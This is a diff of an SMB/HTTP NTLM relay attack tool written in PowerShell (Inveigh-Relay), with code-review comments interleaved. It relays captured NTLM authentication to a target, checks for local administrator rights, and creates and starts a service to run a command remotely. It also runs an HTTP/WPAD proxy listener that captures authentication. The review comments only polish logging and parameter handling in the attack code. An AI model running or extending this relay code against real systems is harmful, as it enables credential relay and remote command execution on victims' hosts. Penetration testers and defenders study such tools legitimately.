elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
{
$inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
+ }
+
}
$packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
@@ -1995,9 +2128,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadAndXRequest'
$SMB_client_stage_next = 'CloseServiceHandle'
$SMB_close_service_handle_stage = 1
@@ -2009,9 +2142,19 @@ $SMB_relay_response_scriptblock =
if($SMB_close_service_handle_stage -eq 1)
{
$inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")])
$SMB_close_service_handle_stage++
$packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
+ }
+
}
else
{
@@ -2030,9 +2173,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
}
'CloseRequest'
@@ -2044,9 +2187,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'TreeDisconnect'
}
@@ -2059,9 +2202,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'Logoff'
}
@@ -2074,9 +2217,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'Exit'
}
@@ -2085,8 +2228,18 @@ $SMB_relay_response_scriptblock =
if($SMB_relay_failed)
{
$inveigh.console_queue.Add("SMB relay failed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")])
$SMB_client_stage = 'Exit'
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
+ }
+
}
}
@@ -2114,9 +2267,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'CreateRequest'
}
@@ -2134,9 +2287,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'RPCBind'
}
@@ -2156,9 +2309,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'OpenSCManagerW'
}
@@ -2177,9 +2330,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
{
@@ -2194,7 +2347,7 @@ $SMB_relay_response_scriptblock =
'StatusPending'
{
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
{
@@ -2219,9 +2372,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'CheckAccess'
}
@@ -2232,11 +2385,20 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
{
$inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")])
$SMB_service_manager_context_handle = $SMB_client_receive[108..127]
$packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ }
+
if($SCM_data.Length -lt $SMB_split_index)
{
$SMB_client_stage = 'CreateServiceW'
@@ -2250,8 +2412,18 @@ $SMB_relay_response_scriptblock =
elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
{
$inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ }
+
}
else
{
@@ -2274,9 +2446,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'StartServiceW'
}
@@ -2299,9 +2471,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if($SMB_split_stage_final -le 2)
{
@@ -2333,9 +2505,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
if($SMB_split_stage -ge $SMB_split_stage_final)
{
@@ -2363,9 +2535,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'StartServiceW'
}
@@ -2375,8 +2547,21 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
{
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
+ $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
+ }
+
$inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")])
+ $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
$SMB_service_context_handle = $SMB_client_receive[112..131]
$SMB2_message_ID += 20
$packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
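Review bot: the 'Trying to execute SMB relay command on $Target' console and log entries now fire inside the service-created branch, before the StartServiceW request is assembled and written in the following hunk; if packet construction throws in between, the log will show an execution attempt that never reached the wire. Keep the message next to the `Write` that sends the request, as it was before, or reword it to describe what has actually happened at that point. Separately, the blank `+` line inserted directly after the opening `{` is a stray; the surrounding code opens blocks without one.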
@@ -2392,19 +2577,27 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")])
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'DeleteServiceW'
}
elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
{
$inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")])
$SMB_relay_failed = $true
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
+ }
+
}
else
{
@@ -2419,12 +2612,32 @@ $SMB_relay_response_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
{
$inveigh.console_queue.Add("SMB relay command executed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
+ }
+
}
elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
{
$inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("SMB relay service $SMB_service failed to start on $Target")
+ }
+
}
$SMB2_message_ID += 20
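Review bot: the two 'SMB relay service $SMB_service failed to start on $Target' entries added in the `elseif` branch lack the `$(Get-Date -format 's') - ` prefix that every other entry in this patch carries (the removed line had the same omission, so the patch carries a pre-existing inconsistency forward). Prefix both so that log consumers keyed on the leading timestamp do not drop or mis-sort the line.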
@@ -2441,9 +2654,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'ReadRequest'
$SMB_client_stage_next = 'CloseServiceHandle'
$SMB_close_service_handle_stage = 1
@@ -2455,10 +2668,20 @@ $SMB_relay_response_scriptblock =
if($SMB_close_service_handle_stage -eq 1)
{
$inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")])
$SMB2_message_ID += 20
$SMB_close_service_handle_stage++
$packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
+ }
+
}
else
{
@@ -2479,9 +2702,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
}
'CloseRequest'
@@ -2495,9 +2718,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'TreeDisconnect'
}
@@ -2512,9 +2735,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'Logoff'
}
@@ -2529,9 +2752,9 @@ $SMB_relay_response_scriptblock =
$packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
$NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
$SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
$SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
$SMB_client_stage = 'Exit'
}
@@ -2540,8 +2763,18 @@ $SMB_relay_response_scriptblock =
if($SMB_relay_failed)
{
$inveigh.console_queue.Add("SMB relay failed on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")])
$SMB_client_stage = 'Exit'
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
+ }
+
}
}
@@ -2550,9 +2783,19 @@ $SMB_relay_response_scriptblock =
if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
{
- $inveigh.SMB_relay = $false
$inveigh.console_queue.Add("SMB relay auto disabled due to success")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
+ $inveigh.SMB_relay = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
+ }
+
}
}
@@ -2564,10 +2807,10 @@ $SMB_relay_response_scriptblock =
}
-# HTTP/HTTPS Server ScriptBlock
+# HTTP/HTTPS/Proxy Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse)
+ param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
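Review bot: `$WPADAuthIgnore` is inserted into the middle of the `param(...)` list, between `$WPADAuth` and `$WPADResponse`. Runspace scriptblocks are normally started with positional `AddArgument` calls, so every caller must add the new argument at exactly this position; otherwise the value meant for `$WPADResponse` lands in `$WPADAuthIgnore` and `$WPADResponse` is left null. Appending new parameters at the end of the list, or switching the invocation to named `AddParameter` calls, avoids this class of mistake.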
@@ -2640,6 +2883,8 @@ $HTTP_scriptblock =
$HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+ $HTTP_client_close = $true
+ $relay_step = 0
if($proxy_listener)
{
@@ -2654,23 +2899,35 @@ $HTTP_scriptblock =
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")])
$HTTP_running = $false
- }
- $HTTP_client_close = $true
- $relay_step = 0
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
+ }
+
+ }
:HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_send = $true
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
$HTTP_header_cache_control = ""
$HTTP_header_authenticate = ""
$HTTP_header_authenticate_data = ""
$HTTP_message = ""
$HTTP_header_authorization = ""
+ $HTTP_header_host = ""
+ $HTTP_header_user_agent = ""
+ $HTTP_request_raw_URL = ""
+ $NTLM = "NTLM"
while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
{
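Review bot: the `catch` for the listener start logs only 'Error starting $HTTP_type listener' and discards the exception; the usual cause is another process already bound to `$HTTPPort`, and without `$_.Exception.Message` in the entry the operator has to rediscover that by hand. Append the exception message to the console and log strings. Hoisting `$HTTP_client_close = $true` and `$relay_step = 0` out of the catch and up to the listener setup is correct, since they are loop state rather than error handling.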
@@ -2690,9 +2947,19 @@ $HTTP_scriptblock =
if($relay_reset -gt 2)
{
$inveigh.console_queue.Add("SMB relay attack resetting")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")])
$SMB_relay_socket.Close()
$relay_step = 0
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - SMB relay attack resetting")
+ }
+
}
}
@@ -2745,6 +3012,61 @@ $HTTP_scriptblock =
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
